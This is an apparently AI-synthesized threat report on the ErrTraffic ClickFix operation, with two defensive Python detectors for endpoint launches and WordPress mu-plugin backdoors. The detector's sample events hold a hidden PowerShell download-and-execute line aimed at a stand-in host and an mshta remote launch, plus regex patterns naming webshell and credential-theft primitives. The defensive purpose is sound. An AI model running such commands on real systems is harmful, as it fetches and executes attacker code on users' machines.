VYPR
Research · Published Jun 17, 2026 · 1 source

ErrTraffic MaaS Uses Fake reCAPTCHA and Cloudflare Turnstile Lures to Execute PowerShell Commands

A new Malware-as-a-Service operation called ErrTraffic uses compromised WordPress sites to trick victims into running malicious PowerShell commands via fake CAPTCHA screens.

A new and rapidly growing cybercrime tool called ErrTraffic is making waves across the threat landscape, targeting internet users through cleverly disguised verification screens. The framework tricks victims into running malicious PowerShell commands on their own machines, all while believing they are simply completing a routine security check. It first appeared in late 2025 and has since grown into a full Malware-as-a-Service operation that allows cybercriminals to rent the tool and deploy their own attacks against a wide range of targets.

ErrTraffic works by injecting a harmful JavaScript snippet into legitimate but compromised WordPress websites. When an unsuspecting visitor lands on one of these pages, they are shown a fake verification screen that closely mimics trusted services like Google reCAPTCHA or Cloudflare Turnstile. The victim is prompted to press a keyboard shortcut, which secretly executes a PowerShell command that has already been quietly loaded into their clipboard by the malicious background script.

Analysts at Sekoia said in a report shared with Cyber Security News (CSN) that ErrTraffic is built on the ClickFix social engineering tactic and uses a technique called EtherHiding to conceal its command-and-control infrastructure inside Polygon blockchain smart contracts. This design makes it significantly harder for security tools to detect and block malicious traffic, since the attacker infrastructure can be rotated without redeploying code.

The tool is sold by a threat actor operating under the handle LenAI on the cybercrime forum Exploit.IN and through Telegram. Pricing climbed throughout 2026, with monthly subscriptions rising from $300 to $380 and source code prices jumping from $1,500 in January to $4,500 with lifetime updates included. The steep pricing reflects both the framework's effectiveness and its growing reputation within underground criminal communities.

Security researchers identified two distinct ErrTraffic clusters, named "Analytics" and "Beer," each running separate infrastructure and delivering different malware families including Vidar, Stealc, Remus, Salat, SmokeLoader, and various remote access tools. Some WordPress sites were found infected by both clusters simultaneously, pointing to competition and operational overlap between the multiple threat actors leveraging this framework.

The infection chain begins the moment a visitor loads a compromised WordPress page. A hidden JavaScript payload, encoded using Base64 and XOR techniques, queries the Polygon blockchain to retrieve the active C2 server address. This rotating infrastructure model allows attackers to swap servers daily without modifying the thousands of infected websites already hosting their injected code. Once the C2 address is resolved, the script loads the ClickFix lure through API endpoints such as /cf.js or /api/css.js, depending on the active cluster.
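One defender-side check for the endpoint half of this chain (the victim's own keyboard shortcut launching a command the page loaded into the clipboard), as an added example that is not part of the original report or of Sekoia's detection content. It scores Sysmon-style process-creation events (Image, ParentImage, CommandLine fields are assumed) and assumes the lure's shortcut goes through the Windows Run dialog, so explorer.exe is the parent of the launched interpreter; the sample events, indicator regexes and weights are constructed for illustration and would need tuning in a real environment.

```python
from __future__ import annotations

import re

# Constructed sample process-creation events in a simplified Sysmon Event ID 1
# shape. They are invented for this example and are not telemetry from the campaign.
SAMPLE_EVENTS = [
    {   # ClickFix-style launch: Run dialog (explorer.exe) -> hidden PowerShell download cradle
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -w hidden -ep bypass -c \"iex ((New-Object Net.WebClient).DownloadString('https://c2.example.invalid/cf.js'))\"",
    },
    {   # Benign: a user running a local script from the Run dialog
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1",
    },
    {   # Encoded command from cmd.exe (e.g. a scheduled task): suspicious, but no Run-dialog parent
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "powershell.exe -w hidden -enc QQBCAEMA",
    },
    {   # Run-dialog launch of mshta with a remote URL
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "mshta.exe https://lure.example.invalid/verify",
    },
]

# Interpreters a pasted one-liner typically lands in.
LAUNCHERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Parent that indicates an interactive Run-dialog launch (assumption: Win+R path).
RUN_DIALOG_PARENTS = {"explorer.exe"}
PARENT_WEIGHT = 2  # a Run-dialog parent counts as two indicators

# Hypothetical command-line indicators, one point each (order matters for the report).
INDICATORS = {
    "encoded_command": re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-ep\s+bypass|executionpolicy\s+bypass", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|invoke-restmethod", re.I),
    "inline_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "remote_hta": re.compile(r"\bmshta(?:\.exe)?\s+[\"']?https?://", re.I),
}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: dict) -> dict | None:
    """Score one process-creation event; None when it is not a launcher or has no indicators."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    if image not in LAUNCHERS:
        return None
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if not hits:
        return None  # launcher with a clean command line: parent alone is not enough
    score = len(hits) + (PARENT_WEIGHT if parent in RUN_DIALOG_PARENTS else 0)
    return {"image": image, "parent": parent, "score": score, "indicators": hits}


def detect_clickfix(events: list, threshold: int = 3) -> list:
    """Return the scored events that reach the alert threshold."""
    findings = []
    for event in events:
        result = score_event(event)
        if result and result["score"] >= threshold:
            findings.append(result)
    return findings


if __name__ == "__main__":
    for finding in detect_clickfix(SAMPLE_EVENTS):
        print(f"{finding['parent']} -> {finding['image']} score={finding['score']} "
              f"indicators={', '.join(finding['indicators'])}")
```

The weighting is deliberately simple: the Run-dialog parent is the part of the chain an unsuspecting user produces by following the lure, so it is worth more than any single command-line token, while a launcher started from explorer.exe with a clean command line (the second sample) produces nothing. The encoded command from cmd.exe in the third sample stays below the threshold here; in an environment where encoded commands are rare, it would deserve its own rule.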

Attackers also impersonate legitimate AI platforms to extend ErrTraffic's reach. Malicious websites posing as Google Antigravity and ChatGPT were used to deliver the same ClickFix lure, targeting users searching for AI software. These campaigns are believed to be spread via malvertising, allowing them to reach victims entirely outside the compromised WordPress ecosystem.

After gaining access to a WordPress site through stolen administrator credentials, attackers deploy a PHP backdoor named session-manager.php inside the mu-plugins directory, where WordPress automatically loads it without any manual activation. The implant harvests login credentials by intercepting authentication requests, skims WooCommerce order data in a server-side Magecart-style attack, and provides a webshell for remote code execution. To avoid detection, the backdoor monitors incoming User-Agent strings for signatures belonging to tools like Wordfence and Nikto, then pauses all malicious behavior for thirty minutes when those tools are identified.
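Because the implant auto-loads from mu-plugins and suppresses itself when a known scanner's User-Agent appears, a useful complementary check is an offline file scan of that directory, which the backdoor cannot see coming. The following is an added example, not code from the report or from any scanner vendor: it walks wp-content/mu-plugins, scores each PHP file against a hypothetical rule set built from the behaviours the report describes (User-Agent checks for scanner names, authentication hooks touching password fields, WooCommerce order hooks, dynamic execution and decoded request input), and reports files above a threshold. The two sample plugin files are constructed for the example; the suspicious one contains only indicator fragments and is not a functional implant.

```python
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Hypothetical indicator rules written for this example (not vendor signatures).
# Each is a loose regex; a match contributes one point to a file's score.
INDICATORS = {
    # reads the User-Agent and compares it against security-scanner names
    "scanner_ua_evasion": re.compile(r"HTTP_USER_AGENT[\s\S]{0,400}?(?:wordfence|nikto)", re.I),
    # hooks WordPress authentication and touches submitted password fields
    "credential_hook": re.compile(
        r"(?:wp_authenticate|wp_login|authenticate)[\s\S]{0,600}?"
        r"\$_(?:POST|REQUEST)\[\s*['\"](?:pwd|log|user_pass|password)['\"]", re.I),
    # hooks WooCommerce order processing (server-side skimming surface)
    "woocommerce_hook": re.compile(r"woocommerce_[a-z_]*order", re.I),
    # writes or sends data out of the site
    "outbound_or_write": re.compile(r"\b(?:curl_init|wp_remote_post|file_put_contents|fwrite)\s*\(", re.I),
    # classic webshell primitives
    "dynamic_exec": re.compile(r"\b(?:eval|assert|system|shell_exec|passthru|proc_open|create_function)\s*\(", re.I),
    # decodes attacker-controlled request input
    "decoded_input": re.compile(r"base64_decode\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)", re.I),
}

# Constructed benign mu-plugin: turns off XML-RPC, nothing else.
BENIGN_PLUGIN = """<?php
/* Constructed benign mu-plugin: turns off XML-RPC. */
add_filter('xmlrpc_enabled', '__return_false');
"""

# Constructed sample with indicator fragments only; the stubs do nothing.
SUSPICIOUS_SAMPLE = r"""<?php
// Constructed sample for the scanner: indicator fragments only, no working implant.
$ua = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');
if (strpos($ua, 'wordfence') !== false || strpos($ua, 'nikto') !== false) {
    return;
}
add_action('wp_authenticate', 'sm_on_auth');
function sm_on_auth() {
    $seen = isset($_POST['pwd']);
}
add_action('woocommerce_checkout_order_processed', 'sm_on_order');
function sm_on_order() {
    $payload = base64_decode($_REQUEST['q'] ?? '');
}
"""


def scan_file(path: Path) -> dict | None:
    """Score one PHP file; None when no indicator matches."""
    text = path.read_text(encoding="utf-8", errors="replace")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if not hits:
        return None
    return {"path": path.name, "score": len(hits), "indicators": hits}


def scan_mu_plugins(mu_dir, threshold: int = 2) -> list:
    """Walk a mu-plugins directory and return PHP files at or above the score threshold."""
    findings = []
    for path in sorted(Path(mu_dir).rglob("*.php")):
        if not path.is_file():
            continue  # skip directories and anything that is not a regular file
        result = scan_file(path)
        if result and result["score"] >= threshold:
            findings.append(result)
    return findings


def build_sample_tree(base) -> Path:
    """Create a constructed mu-plugins directory with one benign and one suspicious file."""
    mu = Path(base) / "wp-content" / "mu-plugins"
    mu.mkdir(parents=True, exist_ok=True)
    (mu / "disable-xmlrpc.php").write_text(BENIGN_PLUGIN, encoding="utf-8")
    (mu / "session-manager.php").write_text(SUSPICIOUS_SAMPLE, encoding="utf-8")
    (mu / "notes.txt").write_text("not PHP, must be skipped\n", encoding="utf-8")
    return mu


def run_sample_scan() -> list:
    """Build the sample tree in a temporary directory, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_mu_plugins(build_sample_tree(tmp))


if __name__ == "__main__":
    for finding in run_sample_scan():
        print(f"{finding['path']}: score={finding['score']} "
              f"indicators={', '.join(finding['indicators'])}")
```

The scan keys on behaviour, not on the file name, since session-manager.php is simply the name this campaign used and a renamed copy should still score. Run it from a shell on the server or against a backup copy of the site, where the implant's User-Agent check has no effect; treat any hit in mu-plugins as worth a manual read, because legitimate must-use plugins rarely need to inspect scanner User-Agents or decode base64 from request parameters.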

Synthesized by Vypr AI